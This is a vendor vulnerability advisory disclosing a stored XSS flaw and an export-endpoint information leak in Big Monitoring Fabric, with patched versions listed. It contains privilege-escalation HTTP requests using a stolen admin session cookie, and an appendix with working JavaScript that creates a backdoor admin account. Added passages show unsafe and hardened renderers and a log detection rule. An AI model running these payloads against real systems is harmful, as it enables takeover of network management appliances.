The following document describes identified vulnerabilities in the Big Monitoring Fabric application. Two high-risk vulnerabilities were found within the application.
Successful exploitation of the cross-site scripting (XSS) vulnerability would grant an unauthenticated remote attacker administrative access to the Big Monitoring Fabric application and (due to the nature of the application) SSH console access to the affected system.
The sensitive information disclosure vulnerability could be exploited by a low privilege read-only user to escalate their privileges up to an administrative account. Exploitation would allow the attacker to have SSH console access to the affected system.
Two high-risk vulnerabilities.
Product Vendor | Product Name | Affected Version |
--- | --- | --- |
Big Switch Networks | Big Monitoring Fabric | until version 7.1.4 |
Big Monitoring Fabric is an enterprise network switch monitoring and management software solution. The project’s official website is https://www.bigswitch.com.
Two vulnerabilities were identified within the Big Monitoring Fabric application:
Update to the appropriate version, detailed in the table below:
Application | Patched Version(s) |
--- | --- |
Big Monitoring Fabric | 6.2.4, 6.3.9, 7.0.3, 7.1.4 |
Big Cloud Fabric | 4.5.5, 4.7.7, 5.0.1, 5.1.4 |
Multi-Cloud Director | 1.1.0 |
CVE ID | Security Risk | Impact | Access Vector |
--- | --- | --- | --- |
CVE-2019-19632 | High | Code Execution & Escalation of privileges | Remote |
The /login endpoint in the Big Monitoring Fabric application was vulnerable to stored XSS. An unauthenticated user could submit an invalid username containing a JavaScript XSS payload during the login process, as shown below:
Figure 1 - XSS payload in failed login attempt
The application logged the XSS payload within the invalid username to the /login_history endpoint. The application response contained the arbitrary JavaScript within the XSS payload, as shown below:
Figure 2 - XSS payload shown in /login_history page source code
The JavaScript payload then executed when an administrative user navigated to the affected /login_history endpoint. The payload loaded an external attacker-controlled JavaScript file that created a backdoor admin user (the code for which is included in Appendix A of this advisory). The payload was Base64-encoded and placed in an eval function. The backdoor XSS user was then created, as shown below:
Figure 3 - XSS created backdoor admin user
The team then authenticated to the Big Monitoring Fabric application with administrative permissions using the newly created XSS user. At this point, the team changed the Default admin password, allowing for SSH console access, as shown in the sensitive information disclosure section of this advisory.
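The defect behind this finding is a login-history page that writes the stored username into HTML without encoding it. The following added example (not Big Switch code) shows that renderer in its vulnerable form beside a hardened one; the entry shape `{time, username, result}` is an assumption, since the application's real data model is not described here.

```javascript
// Added example, not Big Switch code: the rendering defect behind this finding,
// shown as a vulnerable renderer beside a hardened one. The entry shape
// {time, username, result} is assumed; the application's real model is not known.

// Vulnerable form: the stored username is interpolated straight into HTML, so a
// failed login whose "username" is markup runs in whoever views the history.
function renderLoginHistoryUnsafe(entries) {
  return entries
    .map(e => `<tr><td>${e.time}</td><td>${e.username}</td><td>${e.result}</td></tr>`)
    .join("");
}

// HTML-entity encode every character that can change context in element content.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened form: every untrusted field is encoded before it reaches the page.
function renderLoginHistory(entries) {
  return entries
    .map(e => `<tr><td>${escapeHtml(e.time)}</td><td>${escapeHtml(e.username)}</td>` +
              `<td>${escapeHtml(e.result)}</td></tr>`)
    .join("");
}

// True when the rendered HTML still carries a live script element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample: one ordinary failure and one whose username is markup.
const sampleEntries = [
  { time: "2019-11-01T10:00:00Z", username: "alice", result: "FAILED" },
  { time: "2019-11-01T10:00:05Z", username: "<script>alert(1)</script>", result: "FAILED" },
];
```

Encoding at the output point is the fix that matters here; rejecting odd usernames at login would still leave any other path into the log unprotected.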
The Big Monitoring Fabric application was affected by one sensitive information disclosure vulnerability. The sensitive information disclosure revealed valid session data for administrative users and RSA private keys that allowed vertical and horizontal privilege escalation.
CVE ID | Security Risk | Impact | Access Vector |
--- | --- | --- | --- |
CVE-2019-19631 | High | Code Execution, Escalation of privileges, & Information Disclosure | Remote |
While authenticated as a user in the read-only or admin groups, the API /api/v1/export endpoint returned SSH RSA private keys and valid user session cookies, including those for administrative users, as shown below:
POST /ws/request HTTP/1.1
…omitted for brevity…
{"request":{"timeout":10,"method":"GET","path":"/api/v1/export","headers":{"Content-Type":"application/json"},"query":""}}
The SSH private keys appeared to be legitimate, but the team was unable to use them to gain further access. The admin session cookie was valid, and read-only users could use it to perform vertical privilege escalation. First, the following API request was sent to remove a low-privilege read-only user from the read-only group:
PATCH /api/v1/data/controller/core/aaa/group[name="read-only"]
…omitted for brevity…
Cookie: session_cookie=WOIcPiyvBtXj8KZHhpbuIkyjRcOoVemM
…omitted for brevity…
{"user":[]}
Figure 4 - Request to remove low user from read-only group
The application responded with a 204 status code, which indicated that the user had successfully been removed from the low privilege group. Once the user was removed from the read-only group, the following request was sent to add the user to the admin group:
PATCH /api/v1/data/controller/core/aaa/group[name="admin"]
…omitted for brevity…
Cookie: session_cookie=WOIcPiyvBtXj8KZHhpbuIkyjRcOoVemM
…omitted for brevity…
{"user":["admin","low"]}
Figure 5 - Request to add low user to admin group
The team then authenticated to the Big Monitoring Fabric application with the low user, which now had administrative privileges. Using the newly gained administrative permissions, the Default admin password was changed, as shown below:
Figure 6 - Default admin password reset
The password change did not require knowledge of the original password. The Default admin password change also affected the SSH console admin authentication, which allowed access to the SSH console with the new credentials.
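Both requests above, like the export read, travel through the /ws/request proxy endpoint, which wraps an inner REST call as a JSON envelope with its own method, path and body. The following added example (not Big Switch code) parses that envelope from audit-log entries and flags the inner calls this advisory shows being abused; it assumes the log keeps the raw envelope body and the authenticated user per request, and the benign path in the sample is made up.

```javascript
// Added example, not Big Switch code: a log-side check for the /ws/request proxy
// envelope shown in this advisory, which wraps an inner REST call as
// {"request":{"method":...,"path":...,"body":...}}. It assumes the audit log keeps
// the raw envelope body and the authenticated user per request (an assumption).

// Inner calls that are only expected from a deliberate administrative workflow.
const SENSITIVE_RULES = [
  { name: "export-endpoint-read", method: "GET",
    path: /^\/api\/v1\/export$/ },
  { name: "admin-group-change", method: "PATCH",
    path: /^\/api\/v1\/data\/controller\/core\/aaa\/group\[name="admin"\]$/ },
  { name: "local-user-create", method: "POST",
    path: /^\/api\/v1\/data\/controller\/core\/aaa\/local-user\[/ },
];

// Parse one envelope; null when it is not a well-formed /ws/request body.
function parseEnvelope(raw) {
  try {
    const req = JSON.parse(raw).request;
    if (!req || typeof req.method !== "string" || typeof req.path !== "string") return null;
    return { method: req.method.toUpperCase(), path: req.path, body: req.body || "" };
  } catch (e) {
    return null;
  }
}

// Names of the rules one envelope matches (empty when none).
function matchSensitive(raw) {
  const env = parseEnvelope(raw);
  if (!env) return [];
  return SENSITIVE_RULES
    .filter(r => r.method === env.method && r.path.test(env.path))
    .map(r => r.name);
}

// Constructed sample log entries modelled on the requests in this advisory;
// the third path is a made-up benign call, not a real endpoint.
const sampleLog = [
  { user: "low", body: '{"request":{"timeout":10,"method":"GET","path":"/api/v1/export","headers":{"Content-Type":"application/json"},"query":""}}' },
  { user: "low", body: '{"request":{"timeout":10,"method":"PATCH","path":"/api/v1/data/controller/core/aaa/group[name=\\"admin\\"]","headers":{},"body":"{\\"user\\":[\\"admin\\",\\"low\\"]}"}}' },
  { user: "admin", body: '{"request":{"timeout":10,"method":"GET","path":"/api/v1/example/benign","headers":{}}}' },
  { user: "low", body: "not json" },
];

// Every (user, rule) hit; a read-only user reaching these paths stands out.
function findSensitiveCalls(log) {
  return log.flatMap(e => matchSensitive(e.body).map(rule => ({ user: e.user, rule })));
}
```

Matching on the inner path rather than the outer URL is the point: a rule keyed on /ws/request alone sees every call as the same request.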
The following code was created and used for the XSS finding of this advisory:
// XSS payload to create a backdoor admin user
// Payload was base64 encoded and wrapped in JavaScript eval(atob("[Encoded Payload Here]"))
// Function to create backdoor user
Backdoor = async () => {
var xhr = new XMLHttpRequest();
xhr.open("POST", "/ws/request", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json");
// Grab csrftoken from cookies and set to header
xhr.setRequestHeader("X-CSRFToken", document.cookie.match(new RegExp('(^|)'+'csrftoken' + '=([^;]+)'))[0].split('=')[1]);
xhr.send('{"request":{"timeout":10,"method":"POST","path":"/api/v1/data/controller/core/aaa/local-user[user-name=\\"XSS\\"]","headers":{"Content-Type":"application/json"},"body":"{\\"user-name\\":\\"XSS\\",\\"password\\":\\"method=PBKDF2WithHmacSHA512,salt=DKB4mzOZvfE5KSYm4eGVqq,rounds=25000,ph=true,60X6SfgOmeiTmHq0fc7h1wSpSYtgoyzOA2gIPe8VBSM8V5nZ4x)3grol_YN4pKKZPMJE3GGWdWLvihsk9be3kQ\\"}"}}')
getAdmin()
}
// Function to grant admin permissions
getAdmin = async () => {
var xhr = new XMLHttpRequest();
xhr.open("POST", "/ws/request", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json");
// Same CSRF token lookup as above
xhr.setRequestHeader("X-CSRFToken", document.cookie.match(new RegExp('(^|)'+'csrftoken' + '=([^;]+)'))[0].split('=')[1]);
xhr.send('{"request":{"timeout":10,"method":"PATCH","path":"/api/v1/data/controller/core/aaa/group[name=\\"admin\\"]","headers":{"Content-Type":"application/json"},"body":"{\\"user\\":[\\"admin\\",\\"XSS\\"]}"}}')
}
// Run once the page has loaded (function name must match the definition above)
onload=Backdoor();